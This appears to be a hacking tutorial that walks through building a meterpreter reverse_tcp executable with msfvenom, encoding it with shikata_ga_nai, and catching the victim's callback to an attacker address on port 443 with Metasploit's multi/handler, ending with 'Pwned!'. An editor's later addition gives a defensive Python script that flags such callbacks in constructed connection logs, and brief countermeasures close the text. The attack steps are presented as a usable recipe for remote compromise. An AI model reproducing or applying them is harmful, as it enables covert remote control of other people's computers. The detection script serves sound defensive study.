Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R2
Victim O.S : Windows 7 SP1
After the last tutorial about generating shellcode with msfpayload, today we will learn to use another Metasploit Framework command-line tool called msfvenom.
In this tutorial about creating an exploit with msfvenom to hack Windows 7 SP1, we will build the exploit with msfvenom, execute it on the victim, and then try to connect to the victim's computer.
Here is the explanation of msfvenom that I got from offensive-security.com:
msfvenom is a combination of msfpayload and msfencode, putting both of these tools into a single Framework instance. The advantages of msfvenom are:
- One single tool
- Standardized command line options
- Increased speed
Requirements :
1. Metasploit Framework
Step by step :
1. Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tool.
I think the explanation above is already clear about the usage of msfvenom.
2. In this tutorial I want to create an exploit generated by msfvenom with a meterpreter payload, and I also want to encode it using the shikata_ga_nai encoder. To see the options you need to set for this payload, use the -o option after you have chosen your payload.
3. There it is: we need to set LHOST and LPORT to make this exploit work. My IP address is 192.168.8.91, so I set LHOST to that IP, and I set LPORT to 443 so that I will receive the connection from the victim on port 443 if the exploit succeeds.
Information :
-p windows/meterpreter/reverse_tcp --> I use meterpreter reverse_tcp for the payload
-e x86/shikata_ga_nai --> the encoder that I use for this tutorial
-i 5 --> the number of encoding iterations
-b '\x00' --> remove the bad chars (here the null byte)
As you can see in the picture above, I generated the exploit in the Desktop folder and named it abc.exe.
4. The exploit generated in step 3 needs to be sent to the victim later. The next step is to set up the listener on our attacker computer using the handler.
5. Run your Metasploit console by executing msfconsole in your terminal.
6. As I already said above, I want to use the meterpreter reverse_tcp payload, so I need to set it up.
Information :
use exploit/multi/handler --> to handle the incoming connection
set payload windows/meterpreter/reverse_tcp --> reverse tcp payload
show options --> show the available options to set
7. Next we also need to set LHOST and LPORT, and make sure they are the same as the ones you set in step 3.
Our handler is ready to receive a connection on port 443.
8. When you send the exploit to the victim and the victim executes it, we get this:
Pwned!
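What the defender sees in steps 3 to 8 is an executable dropped in a user-writable folder (abc.exe on the Desktop) opening an outbound TCP connection to port 443 that the handler is waiting on. The script below, added here as an example and not part of the original tutorial, runs that detection logic over a few constructed process-network events. The CSV field layout, the allowlist of browsers expected to use 443, and the list of user-writable path fragments are all assumptions for the example, not the format of any particular product.

```python
"""
Flag outbound TCP connections on a watched port (default 443) that originate
from an executable running out of a user-writable directory and that is not
on the allowlist of programs expected to use that port.

Example code added by the editor; the events below are constructed and the
field layout (timestamp,image,dst_ip,dst_port,proto) is an assumption.
"""
import csv
import io
import ipaddress

# Constructed sample events. The second line is the pattern this tutorial
# produces: abc.exe on the Desktop calling back to 192.168.8.91:443.
SAMPLE_EVENTS = """\
timestamp,image,dst_ip,dst_port,proto
2012-06-01T10:00:01,C:\\Program Files\\Internet Explorer\\iexplore.exe,93.184.216.34,443,tcp
2012-06-01T10:00:05,C:\\Users\\victim\\Desktop\\abc.exe,192.168.8.91,443,tcp
2012-06-01T10:00:07,C:\\Windows\\System32\\svchost.exe,192.168.8.1,53,udp
2012-06-01T10:00:09,C:\\Users\\victim\\AppData\\Local\\Temp\\update.exe,10.0.0.5,443,tcp
"""

# Assumed site-specific allowlist: programs that legitimately talk TLS on 443.
# Compared lower-cased because Windows paths are case-insensitive.
ALLOWED_443_IMAGES = {
    "c:\\program files\\internet explorer\\iexplore.exe",
}

# Path fragments that mark directories a normal user can write to
# (assumption for the example; tune to the environment).
USER_WRITABLE_FRAGMENTS = ("\\users\\", "\\temp\\")


def parse_events(csv_text):
    """Parse the constructed CSV into a list of dicts, one per event."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def is_user_writable(image):
    """True if the executable path lies under a user-writable location."""
    low = image.lower()
    return any(fragment in low for fragment in USER_WRITABLE_FRAGMENTS)


def suspicious_connections(csv_text, watched_ports=(443,)):
    """Return the events that match the dropped-executable-calls-out pattern.

    Each hit records the image, the destination, and whether the destination
    is an RFC 1918 address (a lab handler like the one in this tutorial sits
    on the local network; a real callback usually does not).
    """
    hits = []
    for event in parse_events(csv_text):
        if event["proto"] != "tcp":
            continue
        if int(event["dst_port"]) not in watched_ports:
            continue
        image = event["image"]
        if image.lower() in ALLOWED_443_IMAGES:
            continue
        if not is_user_writable(image):
            continue
        hits.append({
            "timestamp": event["timestamp"],
            "image": image,
            "dst": f'{event["dst_ip"]}:{event["dst_port"]}',
            "private_dst": ipaddress.ip_address(event["dst_ip"]).is_private,
        })
    return hits


if __name__ == "__main__":
    for hit in suspicious_connections(SAMPLE_EVENTS):
        print(hit["timestamp"], hit["image"], "->", hit["dst"],
              "(private destination)" if hit["private_dst"] else "")
```

Running it flags abc.exe and the Temp-folder update.exe and leaves the browser and svchost alone. The allowlist is the weak point of this approach: a payload that injects into an allowed browser process would pass, so in practice the image check is combined with parent-process and file-origin signals rather than used on its own.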
Countermeasures :
1. Always update your antivirus to the latest version.
2. Don't forget to install a personal firewall on your PC.
Hope it's useful 🙂